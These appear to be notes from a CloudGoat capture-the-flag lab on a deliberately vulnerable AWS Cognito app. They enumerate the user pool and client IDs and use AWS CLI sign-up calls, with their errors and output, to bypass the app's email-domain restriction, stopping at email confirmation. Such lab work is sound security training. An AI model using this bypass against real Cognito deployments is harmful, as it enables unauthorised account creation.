Enumeration
apigateway_url = <https://yv3j550bik.execute-api.us-east-1.amazonaws.com/vulncognito/cognitoctf-cgidkmmf2u4p1h/index.html>
cloudgoat_output_aws_account_id = XXXXXXXXXXX
Info in the web app source code
UserPoolId: 'us-east-1_ZubY5Tbsd',
ClientId: '4ri2b66pd4vtta5a4a78f3brpv',
- We signup using web app below is sample request send to backend
{"ClientId":"4ri2b66pd4vtta5a4a78f3brpv","Username":"[email protected]","Password":"Erm@12345","UserAttributes":[{"Name":"email","Value":"[email protected]"},{"Name":"given_name","Value":"John"},{"Name":"family_name","Value":"Wick"}],"ValidationData":null}
- Then it shows that account is not confirmed
- This give a restriction i have use .ecorp.com email and con’t confirm account as i get in it
- To bypass it we use aws cli for signup
aws cognito-idp sign-up --client-id 4ri2b66pd4vtta5a4a78f3brpv --username john --password Erm@12345 --user-attributes '[{"Name":"email","Value":"[email protected]"},{"Name":"given_name","Value":"John"},{"Name":"family_name","Value":"Wick"}]'
aws cognito-idp sign-up --client-id 4ri2b66pd4vtta5a4a78f3brpv --username john --password Erm@12345 --user-attribute
s '[{"Name":"email","Value":"[email protected]"},{"Name":"given_name","Value":"John"},{"Name":"family_name","Value":"
Wick"}]'
An error occurred (ResourceNotFoundException) when calling the SignUp operation: User pool client 4ri2b66pd4vtta5a4a78f3brpv does not exist.
┌──(blops㉿Abyssal-Deadspace)-[~]
└─$ aws cognito-idp sign-up --client-id 4ri2b66pd4vtta5a4a78f3brpv --username john --password Erm@12345 --user-attributes '[{"Name":"email","Value":"[email protected]"},{"Name":"given_name","Value":"John"},{"Name":"family_name","Value":"Wick"}]' --region us-east-1
An error occurred (InvalidParameterException) when calling the SignUp operation: Username should be an email.
┌──(blops㉿Abyssal-Deadspace)-[~]
└─$ aws cognito-idp sign-up --client-id 4ri2b66pd4vtta5a4a78f3brpv --username [email protected] --password Erm@12345
--user-attributes '[{"Name":"email","Value":"[email protected]"},{"Name":"given_name","Value":"John"},{"Name":"family
_name","Value":"Wick"}]' --region us-east-1
{
"UserConfirmed": false,
"CodeDeliveryDetails": {
"Destination": "k***@g***",
"DeliveryMedium": "EMAIL",
"AttributeName": "email"
},
"UserSub": "64781498-30a1-70a8-5117-c6e40899ea69"
}
Confirming the email